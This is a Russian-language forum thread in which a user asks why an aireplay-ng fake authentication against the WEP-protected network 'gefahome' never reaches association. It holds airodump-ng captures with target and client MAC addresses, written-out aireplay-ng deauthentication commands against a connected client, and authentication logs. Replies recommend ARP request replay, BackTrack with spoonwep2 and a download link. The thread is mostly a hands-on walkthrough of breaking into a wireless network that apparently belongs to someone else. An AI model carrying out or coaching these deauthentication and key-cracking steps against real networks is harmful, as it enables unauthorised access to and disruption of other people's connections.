Траблы со взломом WEP.

Есть точка, запускаю сбор пакетов:

Code:

                                                                                                                                                                   
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                       
 72:E8:5A:5A:AB:5B   -1   0     8979     2701    0  11  54   WEP  WEP         gefahome                                                                                 
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                             
                                                                                                                                                                       
 72:E8:5A:5A:AB:5B  00:1B:11:1F:A5:60  -67    0 - 2   1844     5884  gefahome                                                                                           
 72:E8:5A:5A:AB:5B  00:0C:F1:1B:13:07  -75    0 - 1     18     6611   

data тут есть тк пявился клиент. Но обычно его нет. Дальше я подменяю мак на 00:0C:F1:1B:13:07 и делаю деаутентификацию:

Code:

mrthe@mrthe-laptop:~$ sudo aireplay-ng -0 0 -e gefahome -a 72:E8:5A:5A:AB:5B -c 00:0C:F1:1B:13:07 mon0
20:44:53  Waiting for beacon frame (BSSID: 72:E8:5A:5A:AB:5B) on channel 11
20:45:03  No such BSSID available.
mrthe@mrthe-laptop:~$ sudo aireplay-ng -0 0 -e gefahome -a 00:1B:11:1F:A5:60 -c 00:0C:F1:1B:13:07 mon0
20:45:18  Waiting for beacon frame (BSSID: 00:1B:11:1F:A5:60) on channel 11
20:45:19  Sending 64 directed DeAuth. STMAC: [00:0C:F1:1B:13:07] [181| 3 ACKs]
20:45:19  Sending 64 directed DeAuth. STMAC: [00:0C:F1:1B:13:07] [182|10 ACKs]

Но тут видно ещё одну проблему, точка не отвечает по BSSID. Второй мак, казалось бы, мак клиента, но он резолвится когда обращаюсь к точке по имени.

Дале пытаюсь аутентифицироваться:

Code:

20:41:40  Sending Authentication Request (Open System) [ACK]
20:41:40  Authentication successful
20:41:40  Sending Association Request
20:41:40  Got a deauthentication packet! (Waiting 3 seconds) [B](это мой пакет деаутентификации, это ок)[/B]

20:41:46  Sending Authentication Request (Open System) [ACK]
20:41:46  Authentication successful
20:41:46  Sending Association Request [ACK]

20:41:49  Sending Authentication Request (Open System)
20:41:50  Authentication successful
20:41:50  Sending Association Request [ACK]

и последние 3 строки так повторяются до бесконечности.. В этом вся и проблема, аутентифицироваться не получается, а без этого генерация пакетов просто не работает.

В чём проблема, и что я делаю не так?

 

1. ты сколько попыток аутентификации ставишь?
2. попробуй spoonwep2 есть где-то в инете, если ты под backtrack ломаешь, то самое то будет, если не найдешь попробую завтра скинуть тебе.

 

0(т.е. до беспонечности). Разве что-то изменится если сократить кол-во? На других точках производил те же действия и всё ок было, с 1-го пакета аутентифицировался.

а spoonwep2 попробую. Да и у меня ubuntu.

 

ну у тебя же пишет что 20:41:46 Authentication successful

зачем еще ее раз проводить? если ты завязался с точкой.
думаю есть смысл поставить 3 а дальше уже ARP request replay

 

когда всё ок пишет примерно так

Code:

19:30:28 Sending Authentication Request (Open System) [ACK]
19:30:28 Authentication successful
19:30:28 Sending Association Request [ACK]
19:30:28 Association successful :-) (AID: 1)

а у меня до ассоциации не доходит. ARP request replay без этого не работает. Точнее работает, но пакеты не генерирует..


Да, а spoonwep2 и немогу поставить, там lzm файл, и я как только не пытался его запустить и открыть.. lzm2dir нету в убунте =\

 

у меня кстати было тоже на одной из точек что аутентификация прошла но нет ассоциации, я просто забил ))
а спунвэп у меня под БэкТрэком запускается. его достаточно в каталог со всеми остальными утилитами закинуть и вперед.

 

забить не интересно) к слову, я собрал ~8k пакетов, пока клиент был. Пас конечно не сбрутился, но мб можно часть паса узнать, или так нельзя?..

а бектрек с лайвсд не видит мою карту, а на виртуалку ставить криво, имхо.

 

а я для этого дела юзаю 3 версию, она у меня прямо с флешки грузится.
Я конечно не гуру, но думаю что 8к пакетов не всегда может хватить, и часть паса имхо нельзя никак увидеть , только целиком.

смотря какой еще вэп ключ, там же вроде есть 64 и 128 бит.

что у тебя за карточка?

 

broadcom. нормальный драйвер(с которым можно вардрайвить) появился только с 2.6.32-го ядра.

 

всеж попробуй backtrack3 + spoonwep2
сама ось тут

и сделай ее на флэшке
тыц

 

CDLINUX.iso + spoonwep2 http://depositfiles.com/ru/files/rbxyd6n06

покупал в комплекте с Gsky-link GS-27USB-5, работает отлично...

 

то же на днях Gsky-link GS-27USB-5 на почту придет, а по делу
bactrack 4 или 3 + spoonwep, дабы автоматизировать процесс

 

spoonwep не всегда корректно отрабатывает

 

Valer, спасибо, но качать 100 мб с депозита я не буду, да и дистр непонятный... проще уже свою карту в бт настроить.

 

я если spoonwep не отрабатывает беру aircrack-ng, aireplay-ng, airodump-ng

 

можно попробовать бактрак обновить ручками (ядро собрать новое, на котором есть поддержка карты)
по сабжу: у меня такое было, насколько я понял - это либо точка слишком далеко, сигнал слабый (в манах на оффсайте айркрака это одна из причин безуспешных попыток ассоциации), либо что то не то с привязкой по маку. в моем случае все решилось увеличением числа попыток ассоцииации, раза с 30 вроде получилось

 

Stopko_0, собирать бектрак круто, но долго и особо нет смысла. хотя, мб попробую.
сигнал, вроде, хороший. нерворк-манагер даёт половину полосок.
с привязкой по маку как только не крутил.
кол-во ассоциаций ставил и 100, результат тот же..